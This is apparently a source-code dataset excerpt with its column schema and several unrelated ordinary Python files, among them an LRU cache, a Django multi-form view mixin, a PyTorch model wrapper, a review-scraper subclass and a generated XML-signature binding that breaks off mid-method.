blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
aaed72c4c34418066429eb2c96fbe9b95606cdb3 | de358ba57518d65393c810da20c53e1c41494bff | /LRUcache.py | 49f000a37b16c4cd24efb3415b3888324acb43b6 | [] | no_license | avirupdandapat/ALGOPROJECT | 43eef94b13e38452cdc6a506b17b6fee581a07e1 | 55b60a0c6e51cae900e243505f6a4557ad4d7069 | refs/heads/master | 2022-12-29T13:02:54.655976 | 2020-10-18T12:23:57 | 2020-10-18T12:23:57 | 305,095,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 878 | py | from collections import deque
class LRUCache:
# @param capacity, an integer
def __init__(self, capacity):
self.capacity = capacity
self.dic = {}
self.q = deque()
# @return an integer
def get(self, key):
if key in self.dic:
self.q.remove(key)
self.q.appendleft(key)
return self.dic[key]
return -1
# @param key, an integer
# @param value, an integer
# @return nothing
def set(self, key, value):
if key in self.dic:
self.q.remove(key)
elif self.capacity == len(self.dic):
keyToRemove = self.q.pop()
del self.dic[keyToRemove]
self.q.appendleft(key)
self.dic[key] = value
if __name__ == '__main__':
l = LRUCache(2)
l.set(1, 10)
l.set(5, 12)
print(l.get(5))
l.get(5)
l.get(1)
| [
"[email protected]"
] | |
da45f7852916d35f50bd49f037a7b3edd42a3e21 | 68d38b305b81e0216fa9f6769fe47e34784c77f2 | /alascrapy/spiders/amazon_uk_reviews.py | 15695e7d86cb23644a4dfb659ed43372c84943c0 | [] | no_license | ADJet1437/ScrapyProject | 2a6ed472c7c331e31eaecff26f9b38b283ffe9c2 | db52844411f6dac1e8bd113cc32a814bd2ea3632 | refs/heads/master | 2022-11-10T05:02:54.871344 | 2020-02-06T08:01:17 | 2020-02-06T08:01:17 | 237,448,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | __author__ = 'leonardo'
from alascrapy.spiders.base_spiders.amazon import AmazonReviewsSpider
class AmazonUkReviewsSpider(AmazonReviewsSpider):
name = 'amazon_uk_reviews'
start_url_format = "https://www.amazon.co.uk/product-reviews/%s/ref=cm_cr_dp_see_all_btm?ie=UTF8&showViewpoints=1&sortBy=recent"
date_format = 'on %d %B %Y'
amazon_kind = 'amazon_uk_id'
language = 'en'
| [
"[email protected]"
] | |
4d1dc1f084686e22f9f832a79dae3c1d0d56dc01 | 43fe6a9d6875f7524204177a3a68229059133789 | /social/account/multiforms.py | 844065a4370c0da415a5df2b271ab382d43f2db9 | [
"MIT"
] | permissive | MiKueen/Social-Network | a011836805ad45228b0031ed1883526b0af02920 | 0b872860f08c3ec6f48a53160128af28787737c7 | refs/heads/master | 2023-04-17T15:33:13.212550 | 2019-07-13T04:40:54 | 2019-07-13T04:40:54 | 196,678,685 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,182 | py | from django.views.generic.base import ContextMixin, TemplateResponseMixin
from django.views.generic.edit import ProcessFormView
from django.http import HttpResponseForbidden
class MultiFormMixin(ContextMixin):
form_classes = {}
prefixes = {}
success_urls = {}
initial = {}
prefix = None
success_url = None
def get_form_classes(self):
return self.form_classes
def get_forms(self, form_classes):
return dict([(key, self._create_form(key, class_name)) \
for key, class_name in form_classes.items()])
def get_form_kwargs(self, form_name):
kwargs = {}
kwargs.update({'initial':self.get_initial(form_name)})
kwargs.update({'prefix':self.get_prefix(form_name)})
if self.request.method in ('POST', 'PUT'):
kwargs.update({
'data': self.request.POST,
'files': self.request.FILES,
})
return kwargs
def forms_valid(self, forms, form_name):
form_valid_method = '%s_form_valid' % form_name
if hasattr(self, form_valid_method):
return getattr(self, form_valid_method)(forms[form_name])
else:
return HttpResponseRedirect(self.get_success_url(form_name))
def forms_invalid(self, forms):
return self.render_to_response(self.get_context_data(forms=forms))
def get_initial(self, form_name):
initial_method = 'get_%s_initial' % form_name
if hasattr(self, initial_method):
return getattr(self, initial_method)()
else:
return {'action': form_name}
def get_prefix(self, form_name):
return self.prefixes.get(form_name, self.prefix)
def get_success_url(self, form_name=None):
return self.success_urls.get(form_name, self.success_url)
def _create_form(self, form_name, form_class):
form_kwargs = self.get_form_kwargs(form_name)
form = form_class(**form_kwargs)
return form
class ProcessMultipleFormsView(ProcessFormView):
def get(self, request, *args, **kwargs):
form_classes = self.get_form_classes()
forms = self.get_forms(form_classes)
return self.render_to_response(self.get_context_data(forms=forms))
def post(self, request, *args, **kwargs):
form_classes = self.get_form_classes()
form_name = request.POST.get('action')
return self._process_individual_form(form_name, form_classes)
def _process_individual_form(self, form_name, form_classes):
forms = self.get_forms(form_classes)
form = forms.get(form_name)
if not form:
return HttpResponseForbidden()
elif form.is_valid():
return self.forms_valid(forms, form_name)
else:
return self.forms_invalid(forms)
class BaseMultipleFormsView(MultiFormMixin, ProcessMultipleFormsView):
"""
A base view for displaying several forms.
"""
class MultiFormsView(TemplateResponseMixin, BaseMultipleFormsView):
"""
A view for displaying several forms, and rendering a template response.
""" | [
"[email protected]"
] | |
fd975001732ca43e6a45cbcefd0a09a0cf1fd7fa | a37963de31a67c214680d80d9ee3ce4611d28587 | /mrl/modules/model.py | 8f93b82dcc75932df0c875e7910016d0b4a2814d | [
"MIT"
] | permissive | jingweiz/mrl | c4c614877760953b246125688e7df96f9081fc4e | c94ab1685aea85b0d328199adefca543227875af | refs/heads/master | 2022-11-12T01:36:05.354935 | 2020-07-10T23:32:38 | 2020-07-10T23:32:38 | 279,804,300 | 0 | 1 | MIT | 2020-07-15T07:56:50 | 2020-07-15T07:56:49 | null | UTF-8 | Python | false | false | 1,448 | py | import mrl
import torch
from typing import Callable
import os
import pickle
import dill
class PytorchModel(mrl.Module):
"""
Generic wrapper for a pytorch nn.Module (e.g., the actorcritic network).
These live outside of the learning algorithm modules so that they can easily be
shared by different modules (e.g., critic can be used by intrinsic curiosity module).
They are also saved independently of the agent module (which is stateless).
"""
def __init__(self, name : str, model_fn : Callable):
super().__init__(name, required_agent_modules=[], locals=locals())
self.model_fn = model_fn
self.model = self.model_fn()
def _setup(self):
if self.config.get('device'):
self.model = self.model.to(self.config.device)
def save(self, save_folder : str):
path = os.path.join(save_folder, self.module_name + '.pt')
torch.save(self.model.state_dict(), path)
def load(self, save_folder : str):
path = os.path.join(save_folder, self.module_name + '.pt')
self.model.load_state_dict(torch.load(path), strict=False)
def copy(self, new_name):
"""Makes a copy of the Model; e.g., for target networks"""
new_model = dill.loads(dill.dumps(self.model))
model_fn = lambda: new_model
return self.__class__(new_name, model_fn)
def __call__(self, *args, **kwargs):
if self.training:
self.model.train()
else:
self.model.eval()
return self.model(*args, **kwargs) | [
"[email protected]"
] | |
0c3976214f8e28555d2e3ff9dd37ab37dd2c712b | 251e4de91841fc42959e89211d3501ce24c4435e | /eventdriven/adapter/base.py | 253f683289151bfeaaceae339ac6fba3956f10e6 | [
"Apache-2.0"
] | permissive | ZSAIm/EventDriven | df1251c4e9f3f382600159d6626a6c959670c438 | 92bed2b3cde9249724f9cc25f3d19470abda5b9b | refs/heads/master | 2020-12-07T17:04:32.511933 | 2020-02-20T07:51:18 | 2020-02-20T07:51:18 | 232,758,430 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,767 | py | # -*- coding: UTF-8 -*-
from abc import ABC
class AbstractAdapter(ABC):
def __setup__(self, parent, name, **options):
""" 安装适配器过程中调用该方法进行初始化。 """
self._parent = parent
self._instance_name = name
self._options = options
def __name__(self):
""" 返回适配器实例名称。 """
return self._instance_name
def __patch__(self):
""" __setup__ 之后对控制器进行打补丁。 """
pass
def __running__(self):
""" 控制器启动中(线程启动前)。"""
pass
def __run__(self):
""" 控制器启动后调用该方法。 """
pass
def __closing__(self):
""" 控制器发起关闭事件后调用该方法。 """
pass
def __closed__(self):
""" 控制事件关闭后调用该方法。"""
pass
def __exception__(self, error):
""" 控制器事件处理异常调用该方法。"""
pass
def __suspend__(self):
""" 控制器发起挂起事件后调用该方法。 """
pass
def __resume__(self):
""" 控制器发起恢复挂起状态事件后调用该方法。 """
pass
def __mapping__(self):
""" 返回添加的事件处理映射。 """
return {}
def __context__(self):
""" 返回需要添加的全局动态上下文。"""
return {}
def __static__(self):
""" 返回需要添加的静态上下文。"""
return {}
@staticmethod
def __unique__():
""" 返回是否只能安装唯一实例。 """
return False
@staticmethod
def __dependencies__():
""" 返回适配器依赖列表。 """
return []
| [
"[email protected]"
] | |
7075b62d95d63c0abfdebcac5772e9ce9fff30f4 | 02b460257be33634a5e204c12a22d396c49ec1e8 | /ch1/ex1_6.py | e506176ded89c2a72f238158685c3fe6189a0731 | [] | no_license | wxhheian/ptcb | c5250362d5ab0903498e52c5a5d9cbdccc37853f | ae95fb18853f94246b4b1e84371e3f140677c8e8 | refs/heads/master | 2020-07-02T08:28:16.867948 | 2019-08-09T18:49:50 | 2019-08-09T18:49:50 | 201,473,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | ##实现一个键对应多个值的字典
#####实现方法一:将多个值放到不同的容器中
# d = {
# 'a':[1,2,3],
# 'b':[4,5]
# }
# e = {
# 'a':{1,2,3},
# 'b':{4,5}
# }
from collections import defaultdict
d = defaultdict(list)
d['a'].append(1)
d['b'].append(2)
d['b'].append(4)
e = defaultdict(set)
e['a'].add(1)
e['a'].add(2)
e['b'].add(4)
################setdefault
f={}
f.setdefault('a',[]).append(1)
f.setdefault('a',[]).append(2)
| [
"[email protected]"
] | |
e96e099b25cfb3fc367f85f23be963095437e653 | a9fc496e0724866093dbb9cba70a8fdce12b67a9 | /scripts/quest/q5523e.py | 65c50af387328753c10ae50e98802bd1ea180dff | [
"MIT"
] | permissive | ryantpayton/Swordie | b2cd6b605f7f08f725f5e35d23ba3c22ef2ae7c0 | ca6f42dd43f63b1d2e6bb5cdc8fc051c277f326e | refs/heads/master | 2022-12-01T09:46:47.138072 | 2020-03-24T10:32:20 | 2020-03-24T10:32:20 | 253,997,319 | 2 | 0 | MIT | 2022-11-24T08:17:54 | 2020-04-08T05:50:22 | Java | UTF-8 | Python | false | false | 105 | py | # Tot's reward lv 60
sm.completeQuest(5523)
# Lv. 60 Equipment box
sm.giveItem(2433958, 1)
sm.dispose()
| [
"[email protected]"
] | |
ec909014a75777f9c98e33e6bfc8a8965ec22fec | 4448001f31d1f7a56915c620d7a8a12a137b29a2 | /PySpedNFSe/pysped_nfse/rj/xmldsig-core-schema_v01.py | 631217de4b952bfb536cc2c467ca6018907958bf | [] | no_license | DITIntl/lets-keep-open | c7d639a0de9f1fc4778864e74a304ef6facf7506 | 61a6b5b9500b4d4da1799099995176b594a27fb7 | refs/heads/master | 2021-09-07T20:32:46.587547 | 2018-02-28T16:37:56 | 2018-02-28T16:37:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168,964 | py | # -*- coding: utf-8 -*-
# © 2016 Danimar Ribeiro, Trustcode
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
import sys
import getopt
import re as re_
import base64
import datetime as datetime_
etree_ = None
Verbose_import_ = False
(
XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
try:
# lxml
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
except ImportError:
try:
# cElementTree from Python 2.5+
import xml.etree.cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree on Python 2.5+")
except ImportError:
try:
# ElementTree from Python 2.5+
import xml.etree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree on Python 2.5+")
except ImportError:
try:
# normal cElementTree install
import cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree")
except ImportError:
try:
# normal ElementTree install
import elementtree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree")
except ImportError:
raise ImportError(
"Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
if (XMLParser_import_library == XMLParser_import_lxml and
'parser' not in kwargs):
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
kwargs['parser'] = etree_.ETCompatXMLParser()
doc = etree_.parse(*args, **kwargs)
return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError, exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(datetime_.tzinfo):
def __init__(self, offset, name):
self.__offset = datetime_.timedelta(minutes=offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return ('%.15f' % input_data).rstrip('0')
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(
node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return input_data
def gds_validate_datetime(self, input_data, node, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_datetime(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt
def gds_validate_date(self, input_data, node, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = '%04d-%02d-%02d' % (
input_data.year,
input_data.month,
input_data.day,
)
try:
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
except AttributeError:
pass
return _svalue
@classmethod
def gds_parse_date(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
dt = dt.replace(tzinfo=tz)
return dt.date()
def gds_validate_time(self, input_data, node, input_name=''):
return input_data
def gds_format_time(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%02d:%02d:%02d' % (
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%02d:%02d:%02d.%s' % (
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_time(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt.time()
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
@classmethod
def gds_reverse_node_mapping(cls, mapping):
return dict(((v, k) for k, v in mapping.iteritems()))
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'ascii'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
#
# Support/utility functions.
#
def showIndent(outfile, level, pretty_print=True):
if pretty_print:
for idx in range(level):
outfile.write(' ')
def quote_xml(inStr):
if not inStr:
return ''
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
if XMLParser_import_library == XMLParser_import_lxml:
msg = '%s (element %s/line %d)' % (
msg, node.tag, node.sourceline, )
else:
msg = '%s (element %s)' % (msg, node.tag, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace, pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(outfile, level, namespace, name, pretty_print)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
outfile.write('<%s>%s</%s>' % (
self.name, base64.b64encode(self.value), self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type, self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type, self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s",\n' % (
self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class SignatureType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, SignedInfo=None, SignatureValue=None, KeyInfo=None, Object=None):
self.Id = _cast(None, Id)
self.SignedInfo = SignedInfo
self.SignatureValue = SignatureValue
self.KeyInfo = KeyInfo
if Object is None:
self.Object = []
else:
self.Object = Object
def factory(*args_, **kwargs_):
if SignatureType.subclass:
return SignatureType.subclass(*args_, **kwargs_)
else:
return SignatureType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_SignedInfo(self): return self.SignedInfo
def set_SignedInfo(self, SignedInfo): self.SignedInfo = SignedInfo
def get_SignatureValue(self): return self.SignatureValue
def set_SignatureValue(self, SignatureValue): self.SignatureValue = SignatureValue
def get_KeyInfo(self): return self.KeyInfo
def set_KeyInfo(self, KeyInfo): self.KeyInfo = KeyInfo
def get_Object(self): return self.Object
def set_Object(self, Object): self.Object = Object
def add_Object(self, value): self.Object.append(value)
def insert_Object(self, index, value): self.Object[index] = value
def get_Id(self): return self.Id
def set_Id(self, Id): self.Id = Id
def hasContent_(self):
if (
self.SignedInfo is not None or
self.SignatureValue is not None or
self.KeyInfo is not None or
self.Object
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='SignatureType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignatureType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='SignatureType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='SignatureType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.SignedInfo is not None:
self.SignedInfo.export(outfile, level, namespace_, name_='SignedInfo', pretty_print=pretty_print)
if self.SignatureValue is not None:
self.SignatureValue.export(outfile, level, namespace_, name_='SignatureValue', pretty_print=pretty_print)
if self.KeyInfo is not None:
self.KeyInfo.export(outfile, level, namespace_, name_='KeyInfo', pretty_print=pretty_print)
for Object_ in self.Object:
